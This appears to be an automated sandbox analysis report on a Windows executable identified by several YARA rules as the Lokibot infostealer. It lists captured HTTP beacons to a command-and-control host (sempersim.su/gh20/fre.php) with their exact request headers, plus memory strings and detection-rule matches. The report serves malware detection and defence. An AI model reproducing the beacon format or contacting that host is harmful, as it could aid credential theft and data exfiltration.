              Source: global trafficHTTP traffic detected: POST /gh20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 306A36E8Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /gh20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 306A36E8Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /gh20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 306A36E8Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /gh20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 306A36E8Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /gh20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 306A36E8Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /gh20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 306A36E8Content-Length: 163Connection: close
              Source: hfyhigXccT.exe, 00000000.00000003.250750964.0000000005F86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://en.w=
              Source: hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
              Source: hfyhigXccT.exe, 00000005.00000002.519179407.000000000049F000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://sempersim.su/gh20/fre.php
              Source: hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
              Source: hfyhigXccT.exe, 00000000.00000003.259973400.0000000005F88000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.259728044.0000000005F87000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
              Source: hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
              Source: hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
              Source: hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
              Source: hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
              Source: hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
              Source: hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
              Source: hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
              Source: hfyhigXccT.exe, 00000000.00000003.259973400.0000000005F88000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.259728044.0000000005F87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comF
              Source: hfyhigXccT.exe, 00000000.00000003.264877441.0000000005F8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comM
              Source: hfyhigXccT.exe, 00000000.00000003.259973400.0000000005F88000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.259728044.0000000005F87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comituo_
              Source: hfyhigXccT.exe, 00000000.00000003.264877441.0000000005F8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comm
              Source: hfyhigXccT.exe, 00000000.00000003.259973400.0000000005F88000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.259728044.0000000005F87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comrsivb
              Source: hfyhigXccT.exe, 00000000.00000003.259973400.0000000005F88000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.259728044.0000000005F87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comtto9
              Source: hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
              Source: hfyhigXccT.exe, 00000000.00000003.252891597.0000000005F87000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.253123438.0000000005F87000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.253038446.0000000005F88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
              Source: hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
              Source: hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
              Source: hfyhigXccT.exe, 00000000.00000003.253038446.0000000005F88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnscr
              Source: hfyhigXccT.exe, 00000000.00000003.261371262.0000000005FB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/
              Source: hfyhigXccT.exe, 00000000.00000003.261478813.0000000005FB0000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.261600713.0000000005FB0000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.261371262.0000000005FB0000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.261532870.0000000005FB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/9q
              Source: hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
              Source: hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
              Source: hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
              Source: hfyhigXccT.exe, 00000000.00000002.280075598.00000000031F8000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000002.281633954.000000000435F000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000002.281705492.0000000004395000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000005.00000000.276578950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, hfyhigXccT.exe, 00000005.00000002.519105745.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
              Source: hfyhigXccT.exe, 00000000.00000003.255574600.0000000005F8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
              Source: hfyhigXccT.exe, 00000000.00000003.255439447.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.255574600.0000000005F8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/%
              Source: hfyhigXccT.exe, 00000000.00000003.255439447.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.255574600.0000000005F8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/7
              Source: hfyhigXccT.exe, 00000000.00000003.255439447.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.255574600.0000000005F8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/M
              Source: hfyhigXccT.exe, 00000000.00000003.255439447.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.255574600.0000000005F8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
              Source: hfyhigXccT.exe, 00000000.00000003.255574600.0000000005F8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/_
              Source: hfyhigXccT.exe, 00000000.00000003.255439447.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.255574600.0000000005F8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/i
              Source: hfyhigXccT.exe, 00000000.00000003.255439447.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.255574600.0000000005F8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
              Source: hfyhigXccT.exe, 00000000.00000003.251224303.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251819251.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.253424374.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251109332.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.254256494.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251803357.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.254662852.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.252067592.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.254588808.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.250764720.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251698910.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.254981466.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251899560.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.252697276.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.250696385.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251587341.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.254920230.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251361011.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251927308.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.252012786.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.250643837.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
              Source: hfyhigXccT.exe, 00000000.00000003.251224303.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251819251.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.253424374.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251109332.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.254256494.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251803357.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.254662852.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.252067592.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.254588808.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.250764720.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251698910.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.254981466.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251899560.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.252697276.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.250696385.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251587341.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.254920230.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251361011.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251927308.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.252012786.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.250643837.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com2
              Source: hfyhigXccT.exe, 00000000.00000003.251224303.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251819251.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.253424374.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251109332.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.254256494.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251803357.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.254662852.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.252067592.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.254588808.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.250764720.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251698910.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.254981466.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251899560.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.252697276.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.250696385.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251587341.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.254920230.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251361011.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251927308.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.252012786.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.250643837.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.come
              Source: hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
              Source: hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
              Source: hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
              Source: hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
              Source: hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
              Source: hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
              Source: unknownHTTP traffic detected: POST /gh20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 306A36E8Content-Length: 190Connection: close
              Source: unknownDNS traffic detected: queries for: sempersim.su

              System Summary

              barindex
              Source: 0.2.hfyhigXccT.exe.4395410.11.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.hfyhigXccT.exe.4395410.11.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 5.0.hfyhigXccT.exe.400000.14.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 5.0.hfyhigXccT.exe.400000.14.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 5.0.hfyhigXccT.exe.400000.14.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 5.0.hfyhigXccT.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 5.0.hfyhigXccT.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 5.0.hfyhigXccT.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 5.0.hfyhigXccT.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 5.0.hfyhigXccT.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 5.0.hfyhigXccT.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.hfyhigXccT.exe.4395410.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 0.2.hfyhigXccT.exe.4395410.11.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.hfyhigXccT.exe.4395410.11.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.hfyhigXccT.exe.337c0e4.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 0.2.hfyhigXccT.exe.337c0e4.5.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.hfyhigXccT.exe.337c0e4.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.hfyhigXccT.exe.437b3f0.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 0.2.hfyhigXccT.exe.437b3f0.10.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.hfyhigXccT.exe.437b3f0.10.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 5.2.hfyhigXccT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 5.2.hfyhigXccT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 5.2.hfyhigXccT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.hfyhigXccT.exe.437b3f0.10.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.hfyhigXccT.exe.437b3f0.10.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 5.0.hfyhigXccT.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 5.0.hfyhigXccT.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 5.0.hfyhigXccT.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 5.0.hfyhigXccT.exe.400000.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 5.0.hfyhigXccT.exe.400000.12.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 5.0.hfyhigXccT.exe.400000.12.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 5.2.hfyhigXccT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 5.2.hfyhigXccT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 5.2.hfyhigXccT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 5.0.hfyhigXccT.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 5.0.hfyhigXccT.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 5.0.hfyhigXccT.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 5.0.hfyhigXccT.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 5.0.hfyhigXccT.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 5.0.hfyhigXccT.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.hfyhigXccT.exe.3374e98.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 0.2.hfyhigXccT.exe.3374e98.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.hfyhigXccT.exe.3374e98.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 5.0.hfyhigXccT.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 5.0.hfyhigXccT.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 5.0.hfyhigXccT.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 5.0.hfyhigXccT.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 5.0.hfyhigXccT.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 5.0.hfyhigXccT.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 5.0.hfyhigXccT.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 5.0.hfyhigXccT.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 5.0.hfyhigXccT.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.hfyhigXccT.exe.435f5d0.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 0.2.hfyhigXccT.exe.435f5d0.9.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.hfyhigXccT.exe.435f5d0.9.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.hfyhigXccT.exe.32002d8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 0.2.hfyhigXccT.exe.32002d8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
              Source: 0.2.hfyhigXccT.exe.32002d8.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.hfyhigXccT.exe.32002d8.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.281633954.000000000435F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.281705492.0000000004395000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.280075598.00000000031F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000005.00000000.276578950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000005.00000000.276578950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000005.00000000.276578950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000005.00000000.276118609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000005.00000000.276118609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000005.00000000.276118609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000005.00000002.519105745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000005.00000002.519105745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000005.00000002.519105745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000005.00000000.277401723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000005.00000000.277401723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000005.00000000.277401723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
